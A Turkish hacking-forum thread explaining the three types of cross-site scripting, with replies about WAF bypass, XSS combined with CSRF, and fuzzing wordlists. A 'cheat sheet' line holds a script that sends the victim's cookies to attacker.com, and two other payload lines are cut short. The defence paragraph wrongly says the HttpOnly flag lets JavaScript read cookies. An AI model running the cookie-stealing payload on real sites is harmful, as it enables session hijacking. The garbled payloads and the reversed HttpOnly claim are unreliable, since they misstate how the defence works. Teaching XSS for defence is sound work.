Siber Alem / Forum / Thread / 22 / Xss-cross-site-scripting-nedi-r-turkce-detayli-anlatim-rehber
thread_22.sh

XSS (Cross-Site Scripting) NEDİR? - TÜRKÇE DETAYLI ANLATIM & REHBER

2 ответов 9 просмотров Веб-безопасность
Admin
ROOT OP
Rank: Elite
Posts: 39
Rep: 1381
Joined: 2020-01
Rep Progress 1381 / 500
2026-07-21 20:48:18

Selamlar Siber Alem ailesi, bugün sizlere web uygulama güvenliğinde en sık karşımıza çıkan ve Bug Bounty avcılarının en sevdiği zafiyetlerden biri olan XSS (Cross-Site Scripting) zafiyetini kendi tecrübelerimle detaylıca anlatacağım.

XSS Architecture Overview

XSS nedir kısa bir özet geçmek gerekirse: Bir web sitesinin kullanıcıdan aldığı veriyi yeterince süzmeden veya arındırmadan tarayıcıya geri basması sonucu, kurbanın tarayıcısında zararlı JavaScript kodlarının çalıştırılmasıdır.

XSS zafiyeti 3 temel türe ayrılır dostlar:

  1. Reflected XSS: Saldırganın hazırladığı zararlı linke kurban tıklar. Girdi doğrudan URL parametresinden alınır ve sayfaya yansıtılır. Kalıcı değildir.

Örnek URL:

https://hedef-site.com/search?q=<script>alert('SiberAlem')</script>
  1. Stored (Kalıcı) XSS: En tehlikeli XSS türüdür. Zararlı JavaScript kodu veritabanına, yorum alanına veya profil bilgisine kaydedilir. O sayfayı ziyaret eden HERKESİN tarayıcısında bu kod otomatik çalışır. Örneğin bir forum yorum alanına script yapıştırmak gibi.

  2. DOM-Based XSS: Sunucu tarafında hiçbir şey değişmez. Tüm olay kurbanın kendi tarayıcısındaki JavaScript kodlarının (document.location, innerHTML vb.) veriyi güvenli olmadan işlemesinden kaynaklanır.

Peki kurbanın tarayıcısında kod çalıştırınca ne yapabiliyoruz?

  • Kurbanın session çerezlerini (cookie) çalarak hesabına doğrudan sızabilirsiniz.
  • Sahte giriş formları (phishing) oluşturup şifresini çalabilirsiniz.
  • Kullanıcı adına sitede yetkisiz işlemler (arkadaş ekleme, mesaj atma) yaptırabilirsiniz.

🎥 İlgili Video Anlatımı & Uygulamalı Gösterim: YouTube: Web Application Security - Cross-Site Scripting (XSS) Walkthrough

<!-- XSS Payload Hile Sayfası (Cheat Sheet) -->
<script>fetch('http://attacker.com/steal?c='+document.cookie)</script>
<img src=x>
<svg>

XSS Engellemek İçin Ne Yapılmalı? Sunucu tarafında kullanıcıdan gelen HER GİRDİ HTML Entity Encoding işleminden geçirilmelidir. Yani '<' karakteri '&lt;' olarak dönüştürülmelidir. Ayrıca çerezlere kesinlikle HttpOnly bayrağı eklenmelidir ki JavaScript kodları çerezleri okuyablesin.

Umarım faydalı bir anlatım olmuştur, sorularınızı başlık altından sorabilirsiniz arkadaşlar.

Галерея темы (2)

Награды и медали
Script Kiddie
Участник
Элита
Trancer
USER
Rank: Script Kiddie
Posts: 8
Rep: 0
Joined: 2009-01
Rep Progress 0 / 500
2026-07-21 23:57:59

Eline sağlık harika bir özet olmuş dostum! Özellikle DOM-based XSS tarafında innerHTML yerine textContent kullanılması gerektiğini ekleyebiliriz. Bug bounty yaparken WAF bypass için SVG payload'ları çok iş yapıyor.

Награды и медали
BlackH
USER
Rank: Script Kiddie
Posts: 8
Rep: 0
Joined: 2009-01
Rep Progress 0 / 500
2026-07-21 23:57:59

Çok açıklayıcı ve temiz anlatım olmuş kardeşim. HttpOnly bayrağı eklendiğinde çerezler okunamıyor ama kurban adına arka planda istek atmak (XSS + CSRF birleşimi) halen mümkün kalıyor, ona da dikkat etmek lazım.

Награды и медали
mu-b
USER
Rank: Script Kiddie
Posts: 9
Rep: 0
Joined: 2009-01
Rep Progress 0 / 500
2026-07-21 23:57:59

Reis ellerine sağlık, XSS avlarken Burp Suite Intruder ile fuzzing yaparken kullandığın tavsiye ettiğin bir wordlist var mıdır?

Награды и медали

Требуется авторизация

Вы должны войти, чтобы написать ответ. Присоединяйтесь к хакерскому сообществу Siber Alem!

Статистика темы

Views 9
Replies 2
Автор Admin
Создано 2026-07-21
Статус
Открыто

Предупреждение по безопасности

Все эксплойты, статьи и коды, опубликованные в базе данных Siber Alem, предназначены исключительно для образовательных целей. Использование их во вредоносных целях строго запрещено.